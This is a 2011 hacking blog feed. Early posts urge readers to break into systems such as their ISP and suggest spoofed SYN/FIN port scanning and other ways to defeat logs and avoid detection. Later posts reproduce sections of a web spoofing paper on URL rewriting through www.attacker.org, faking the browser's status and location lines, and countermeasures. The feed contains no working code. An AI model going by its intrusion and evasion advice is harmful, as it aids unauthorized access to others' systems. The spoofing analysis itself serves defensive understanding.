HACKING TRUTH: There are two types of ports. There are hardware ports, which are the slots existing behind the CPU cabinet of your system, into which you plug-in or connect your hardware to. For Example, COM1, COM2, Parallel Port etc. However, we are not interested in such ports. We are concerned with the other type of ports, which are the virtual or the software ports. Such a virtual port is basically a virtual pipe through which information goes in and out. And all open ports have a service or daemon running on it. A service or a daemon is nothing but the software running on these ports, which provide a certain service to the users who connect to it. For Example, Port 25 is always open on a server handling mails, as it is port where the Sendmail service is running by default.

**********************

So basically the first step in your quest to breaking into a system is to get as much information on it, as you can. Try to get, the list of open ports, the list of services running on the respective open ports and whole lots of other kind of information to which I will come later.

Anyway, so firstly, get a good Port Scanner, preferably stealth and then do a port scan on the target host. Now one thing that you must remember while doing a port scan is the fact that there are various so called ‘stealth’ port scanners around which claim to be undetectable, however most of them are detectable. So instead of using such’ false claims’ port scanners, I suggest you code one on your own.

But why do I need to use a stealth Port Scanner and how can I code my own Port Scanner? Well, the reason as to why you need a stealth port Scanner is that many system administrators log all port scans and records the IP and other information on such attempts; this makes you susceptible to getting caught. In my opinion the best Port Scanners around are those, which send SYN/FIN packets from a spoofed host, making logging useless. Such a port Scanner would be coded in C, but will not run in Windows. This was just an idea, now it is up to you to code it yourself.

Jai Shree Raam

How to Get Into Root Directory

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:43:00 +0000

I get a lot of emails from people asking me how they can break into their ISP or how they can break into a system etc. Infect, such questions are almost the most common ones, from all the questions I get. Well, after this popular demand, I thought that an entire manual on breaking into systems was needed. So here goes..

You see, breaking into systems or getting root on a system is not as difficult as it seems. And it by no means requires you to be an Uberhacker. Getting into a system is quite easy and it requires you to know at least one programming language (preferably C), and have a more than an average IQ. However, breaking into systems does require a bit of luck and also a bit of carelessness or stupidity on the part of the system administrator of the target system.

What I mean to say by all this is that, breaking into systems is no big deal, anyone could do that, even a script kiddie, however, the part of the entire Hacking process where more than most people falter is the remaining undetected part. Anonymity or remaining anonymous to the Server logs and preventing detection of a break-in is the most difficult part of Hacking into a system.

What separates a good Hacker from a Script Kiddie or a Lamer is that the former has more than several ways of making sure that no one even suspects that there has been a break in, while on the other hand, the later has no clue what so ever as to what he is doing or what he needs to do to prevent such detection. There are so many ready to Use canned C programs or Hacking utilities available on the net, that a huge number of wannabe hackers, download them and use them to Hack into systems. Well, not only do they do not work properly and flawlessly, they also provide no mechanism of remaining anonymous. What is more, say if you are not using a canned Hacking tool, and are also not trying to remain anonymous, then you stand a greater chance of remaining undetected than if you were using such a tool. So think before you use such tools, you might be able to get the Password file and become very kewl, however, you will certainly be caught later if not sooner.

The first step that you need to take once you have decided the target computer is to find out as much information as you can about it. You see, to break into a system you need to exploit a vulnerability existing in the services offered by it. Almost all systems have certain open ports, which have certain daemons or services running on them.

Jai Shree Raam

My Dream Of Making A Hacking Community

noreply@blogger.com (turkiya786) — Wed, 09 Feb 2011 10:28:00 +0000

My dream is to make a community of hackers just like this.........

Jai Shree Raam

WORLDS MOST BEAUTIFUL GIRLS 2011

noreply@blogger.com (turkiya786) — Fri, 28 Jan 2011 14:40:00 +0000

Jai Shree Raam

TALENT HUNT

noreply@blogger.com (turkiya786) — Mon, 24 Jan 2011 05:49:00 +0000

TALENT HUNT

WORLD WIDE TALENT HUNT

noreply@blogger.com (turkiya786) — Fri, 21 Jan 2011 19:21:00 +0000

Jai Shree Raam

Remedies How To protect Yourself ?

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 10:30:00 +0000

Web spoofing is a dangerous and nearly undetectable security attack that can be carried out on today’s Internet. Fortunately there are some protective measures you can take.

Short-term Solution

In the short run, the best defense is to follow a three-part strategy:

disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack;

make sure your browser’s location line is always visible;

pay attention to the URLs displayed on your browser’s location line, making sure they always point to the server you think you’re connected to.

This strategy will significantly lower the risk of attack, though you could still be victimized if you are not conscientious about watching the location line.

At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security attacks, so we recommend that you disable them. Doing so will cause you to lose some useful functionality, but you can recoup much of this loss by selectively turning on these features when you visit a trusted site that requires them.

Long-term Solution

We do not know of a fully satisfactory long-term solution to this problem.

Changing browsers so they always display the location line would help, although users would still have to be vigilant and know how to recognize rewritten URLs. This is an example of a “trusted path” technique, in the sense that the browser is able to display information for the user without possible interference by untrusted parties.

For pages that are not fetched via a secure connection, there is not much more that can be done.

For pages fetched via a secure connection, an improved secure-connection indicator could help. Rather than simply indicating a secure connection, browsers should clearly say who is at the other end of the connection. This information should be displayed in plain language, in a manner intelligible to novice users; it should say something like “Microsoft Inc.” rather than “www.microsoft.com.”

Every approach to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect everyone to be vigilant all of the time is debatable.

Related Work

We did not invent the URL rewriting technique. Previously, URL rewriting has been used as a technique for providing useful services to people who have asked for them.

Existing services that use URL rewriting include The Anonymizer, written by Justin Boyan at Carnegie Mellon University, is a service that allows users to surf the Web without revealing their identities to the sites they visit. The Zippy filter, written by Henry Minsky, presents an amusing vision of the Web with Zippy-the-Pinhead sayings inserted at random.

Fred Cohen first described the use of URL rewriting as an attack technique. Though we did not invent URL rewriting, we believe we are the first to realize its full potential as one component of a security attack that includes the hiding of other clues about the origin of documents.

Acknowledgments

The URL-rewriting part of our demonstration program is based on Henry Minsky’s code for the Zippy filter. We are grateful to David Hopwood for useful discussions about spoofing attacks, and to Gary McGraw and Laura Felten for comments on drafts of this paper. Gary McGraw designed the figure.

For More Information

More information is available turkiya786@gmail.com or +919896382592 or +919728917585.

Jai Shree Raam

Completing the Illusion

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 10:20:00 +0000

The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on. However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack’s existence.

Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous.

The Status Line

The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers.

The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server being contacted. Thus, the victim might notice that www.attacker.org is displayed when some other name was expected.

The attacker can cover up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript programs can write to the status line, and since it is possible to bind JavaScript actions to the relevant events, the attacker can arrange things so that the status line participates in the con game, always showing the victim what would have been on the status line in the real Web. This makes the spoofed context even more convincing.

The Location Line

The browser’s location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress.

This clue can be hidden using JavaScript. A JavaScript program can hide the real location line and replace it by a fake location line that looks right and is in the expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type in URLs normally. The JavaScript program can rewrite typed-in URLs before they are accessed.

Viewing the Document Source

Popular browsers offer a menu item that allows the user to examine the HTML source for the currently displayed page. A user could possibly look for rewritten URLs in the HTML source, and could therefore spot the attack.

The attack can prevent this by using JavaScript to hide the browser’s menu bar, replacing it with a menu bar that looks just like the original. If the user chose “view document source” from the spoofed menu bar, the attacker would open a new window to display the original (non-rewritten) HTML source.

Viewing Document Information

A related clue is available if the victim chooses the browser’s “view document information” menu item. This will display information including the document’s URL. As above, this clue can be spoofed by replacing the browser’s menu bar. This leaves no remaining visible clues to give away the attack.

Tracing the Attacker

Some people have suggested that finding and punishing the attacker can deter this attack. It is true that the attacker’s server must reveal its location in order to carry out the attack, and that evidence of that location will almost certainly be available after an attack is detected.

Unfortunately, this will not help much in practice because attackers will break into the machine of some innocent person and launch the attack there. Stolen machines will be used in these attacks for the same reason most bank robbers make their getaways in stolen cars.

Demonstration

As a demonstration, we have implemented a working version of this attack, including all the tricks described above. The demonstration shows that the Web Spoofing attack would work in practice. Although we have showed the demonstration to many people, we have not made it available on the Web, since that would make it too easy for others to capture our demonstration and modify it to carry out real Web Spoofing attacks.

Jai Shree Raam

How the Attack Works Spoofing the Whole Web

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 10:09:00 +0000

Fig _1.1

You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is not. The attacker need not store the entire contents of the Web. The whole Web is available on-line; the attacker’s server can just fetch a page from the real Web when it needs to provide a copy of the page on the false Web.

The key to this attack is for the attacker’s Web server to sit between the victim and the rest of the Web. This kind of arrangement is called a “man in the middle attack” in the security literature.

URL Rewriting

The attacker’s first trick is to rewrite all of the URLs on some Web page so that they point to the attacker’s server rather than to some real server. Assuming the attacker’s server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of the URL. For example, http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The URL rewriting technique has been used for other reasons by several other Web sites, including the Anonymizer and the Zippy filter. See page 9 for details.)

Figure 1 shows what happens when the victim requests a page through one of the rewritten URLs. The victim’s browser requests the page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker’s server where on the Web to go to get the real document.

Figure 1: An example Web transaction during a Web spoofing attack. The victim requests a Web page. The following steps occur: (1) the victim’s browser requests the page from the attacker’s server; (2) the attacker’s server requests the page from the real server; (3) the real server provides the page to the attacker’s server; (4) the attacker’s server rewrites the page; (5) the attacker’s server provides the rewritten version to the victim.

Once the attacker’s server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document into the same special form by splicing http://www.attacker.org/ onto the front. Then the attacker’s server provides the rewritten page to the victim’s browser.

Since all of the URLs in the rewritten page now point to www.attacker.org, if the victim follows a link on the new page, the page will again be fetched through the attacker’s server. The victim remains trapped in the attacker’s false Web, and can follow links forever without leaving it.

Jai Shree Raam

Consequences

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 10:00:00 +0000

Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the attacker has many possibilities. These include surveillance and tampering.

Surveillance The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form, the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. Since most on-line commerce is done via forms, this means the attacker can observe any account numbers or passwords the victim enters.

As we will see below, the attacker can carry out surveillance even if the victim has a “secure” connection (usually via Secure Sockets Layer) to the server, that is, even if the victim’s browser shows the secure-connection icon (usually an image of a lock or a key).

Tampering The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address.

The attacker can also modify the data returned by a Web server, for example by inserting misleading or offensive material in order to trick the victim or to cause antagonism between the victim and the server.

Jai Shree Raam

TCP and DNS Spoofing

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 09:54:00 +0000

Another class of spoofing attack, which we will not discuss here, tricks the user’s software into an inappropriate action by presenting misleading information to that software. Examples of such attacks include TCP spoofing, in which Internet packets are sent with forged return addresses, and DNS spoofing, in which the attacker forges information about which machine names correspond to which network addresses. These other spoofing attacks are well known, so we will not discuss them further.

Jai Shree Raam

Security-relevant Decisions

noreply@blogger.com (turkiya786) — Thu, 13 Jan 2011 09:53:00 +0000

By “security-relevant decision,” we mean any decision a person makes that might lead to undesirable results such as a breach of privacy or unauthorized tampering with data. Deciding to divulge sensitive information, for example by typing in a password or account number, is one example of a security-relevant decision. Choosing to accept a downloaded document is a security-relevant decision, since in many cases a downloaded document is capable of containing malicious elements that harm the person receiving the document.

Even the decision to accept the accuracy of information displayed by your computer can be security-relevant. For example, if you decide to buy a stock based on information you get from an online stock ticker, you are trusting that the information provided by the ticker is correct. If somebody could present you with incorrect stock prices, they might cause you to engage in a transaction that you would not have otherwise made, and this could cost you money.

Context

A browser presents many types of context that users might rely on to make decisions. The text and pictures on a Web page might give some impression about where the page came from; for example, the presence of a corporate logo implies that the page originated at a certain corporation.

The appearance of an object might convey a certain impression; for example, neon green text on a purple background probably came from Wired magazine. You might think you’re dealing with a popup window when what you are seeing is really just a rectangle with a border and a color different from the surrounding parts of the screen. Particular graphical items like file-open dialog boxes are immediately recognized as having a certain purpose. Experienced Web users react to such cues in the same way that experienced drivers react to stop signs without reading them.

The names of objects can convey context. People often deduce what is in a file by its name. Is manual.doc the text of a user manual? (It might be another kind of document, or it might not be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large software company? (For a while that address pointed to someone else entirely. By the way, the round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob Dole’s 1996 presidential campaign? (It was not; it pointed to a parody site.)

People often get context from the timing of events. If two things happen at the same time, you naturally think they are related. If you click over to your bank’s page and a username/password dialog box appears, you naturally assume that you should type the name and password that you use for the bank. If you click on a link and a document immediately starts downloading, you assume that the document came from the site whose link you clicked on. Either assumption could be wrong.

If you only see one browser window when an event occurs, you might not realize that the event was caused by another window hiding behind the visible one.

Modern user-interface designers spend their time trying to devise contextual cues that will guide people to behave appropriately, even if they do not explicitly notice the cues. While this is usually beneficial, it can become dangerous when people are accustomed to relying on context that is not always correct.

Jai Shree Raam